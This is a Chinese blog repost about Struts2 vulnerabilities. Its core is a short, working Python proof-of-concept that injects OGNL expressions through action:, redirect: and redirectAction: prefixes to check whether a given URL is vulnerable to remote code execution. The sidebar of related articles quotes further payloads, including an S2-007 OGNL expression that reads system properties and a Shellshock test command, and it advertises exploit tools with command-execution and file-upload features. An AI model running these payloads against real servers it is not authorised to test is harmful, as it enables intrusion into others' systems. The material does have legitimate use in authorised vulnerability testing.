struts2漏洞以及测试

最新推荐文章于 2024-11-03 11:01:20 发布
最新推荐文章于 2024-11-03 11:01:20 发布
阅读量157 收藏
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/jiancanxuepiao/p/3198376.html
版权 
# coding: utf-8
import string
import random
import urllib


def poc(url):
    bait = "".join(random.sample(list(string.letters), 32))

    poc = urllib.quote("%{")
    poc += urllib.quote("#test_str=new java.lang.String('{0}'),".format(bait))
    poc += urllib.quote("#a_resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),")
    poc += urllib.quote("#a_resp.getWriter().println(#test_str),")
    poc += urllib.quote("#a_resp.getWriter().flush(),")
    poc += urllib.quote("#a_resp.getWriter().close()")
    poc += urllib.quote("}")

    for prefix in ["action:", "redirect:", "redirectAction:"]:
        if bait in urllib.urlopen("{0}?{1}{2}".format(url, prefix, poc)).read():
            return True

    return False


if __name__ == "__main__":
    import sys
    print poc(sys.argv[1])

 

转载于:https://www.cnblogs.com/jiancanxuepiao/p/3198376.html

weixin_30767921
关注
Struts2漏洞利用工具-可用于检测
08-01
直接输入出现漏洞的url即可攻击. 远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性均构成完全影响。建议大家升级最新jar包!
Struts2漏洞检测(带自己编写使用说明一看就上手)
05-04
Struts2漏洞检测(带自己编写使用说明一看就上手),IP地址段批量端口扫描
struts2-验证(手工)
weixin_30546933的博客
05-17 113
struts2校验有两种实现方法:   1. 手工编写代码实现(基本验证)    2. 基于XML配置方式实现(验证框架) 基本验证(对action的所有方法进行校验)    Action中 * 要继承ActionSupport * 重写Validateable接口中的validate()方法 ,在该方法中完成验证 * 步骤如下:   * validate...
Struts2漏洞检测包---面工具手工检测
12-23
通过发包工具,在ACtion后面加上我的包就行了.
Struts2漏洞检查工具
02-14
struts2检查和利用工具!
Struts2漏洞测试
04-18
Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试...
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
渗透测试是网络安全的重要环节,通过使用这样的工具,不仅可以帮助开发者找出并修复Struts 2中的漏洞,还能提高整体的安全意识,建立更为健壮的安全防御体系。对于企业来说,定期进行这样的安全检查,可以降低被黑客...
Struts2漏洞检查工具2018版.rar
03-31
描述中提到的"Struts2各版本漏洞扫描利用工具"表明该工具不仅能够扫描Struts2应用的漏洞,还可能包含了一些漏洞利用的模块。这可能是为了进行安全测试,模拟黑客可能采取的攻击手段,以便于防御。 在标签中,“漏洞...
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
通常,这个脚本会遍历一系列的漏洞测试用例,针对每个可能的漏洞进行探测。扫描完成后,它会生成报告,列出所有发现的潜在风险和建议的解决措施。 为了确保应用的安全,除了定期使用struts2-scan等自动化工具进行...
Struts2漏洞检查工具2017版.zip
07-24
警告: 本工具为漏洞自查工具,请勿非法攻击他人网站! Struts2漏洞检查工具2017版 V2.0 by 安恒信息应急响应中心。支持S2-032,S2-037,S2-016,S2-019,S2-045,S2-046,S2-048漏洞验证。有对漏洞的命令执行功能、文件上传功能。还有批量验证功能。增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。增加S2-048 Struts 2.3.X,支持检查官方示例struts2-showcase应用的代码执行漏洞。增加安恒信息研究员nike.zheng发现的S2-045。jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。
struts2漏洞检测工具
03-21
struts2漏洞检测工具
Struts2漏洞检测工具2018最新版
10-10
Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞检测
S2-007 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 1377
漏洞原理 如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 POC a.获取tomcat执行路径: %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} b、获取web路径 %{ #req=@org.apache.struts2...
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
剁椒鱼头没剁椒的博客
02-06 9510
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。
墨者学院中的一些漏洞复现
weixin_43940853的博客
09-15 672
Bash漏洞分析溯源 bash漏洞本质上是一个任意代码执行漏洞,是存在于linux命令行下的一种输出漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test 若存在该漏洞,正常情况下会输出(版本号小于bash 4.3的linux或者unix系统上执行以上命令) vulnerable this is a test 这里只是...
struts2漏洞s2-045漏洞利用测试
feinifi的博客
02-20 6425
s2-045漏洞是一个可以执行远程命令的漏洞,该漏洞struts2上传文件使用参数struts.multipart.parser=jakarta,并且文件上传采用了commons-fileupload的api导致的。只是使用struts.multipart.parser=jakarta并不能导致这个问题,需要在请求时,请求头使用Content-Type参数,这个参数必须带上一串奇怪的ognl表达...
struts2漏洞批量检查
oscarli的博客
11-21 6330
检查代码来自 Lucifer。#!/usr/bin/env python # coding=utf-8 # code by Lucifer # Date 2017/10/12 import sys import base64 import warnings import requests from termcolor import cprint warnings.filterwarnings("
深度剖析Struts2远程代码执行漏洞
weixin_34378045的博客
09-19 1586
本文讲的是深度剖析Struts2远程代码执行漏洞, 三月初,安全研究人员发现世界上最流行的JavaWeb服务器框架之一– Apache Struts2存在远程代码执行的漏洞Struts2官方已经确认该漏洞(S2-046,CVE编号为:CVE-2017-5638)风险等级为高危漏洞漏洞描述 该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错...
HashMap为什么线程不安全?
最新发布
rnnf_yyds的博客
11-03 466
HashMap底层是基于数组 + 链表(在 Java 8 以后,当链表长度超过一定阈值时会转换为红黑树)的数据结构。在多线程环境下,当多个线程同时对HashMap进行put操作时,可下面这种情况:假设两个线程 A 和 B 同时执行put操作,它们计算出的插入位置相同(假设为index线程 A 先获取到了当前index位置的节点,在它还没来得及将新节点插入链表(或树)时,线程 B 也获取到了这个位置的节点。
Python实现的Struts2漏洞扫描工具源码解析
本工具使用Python编写,能够执行对Struts2框架的安全扫描,发现配置错误、代码缺陷以及其他可能导致安全漏洞的问题。设计过程中需要充分考虑工具的易用性、扫描的准确性和效率。 4. 代码文件结构与内容 源码包中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值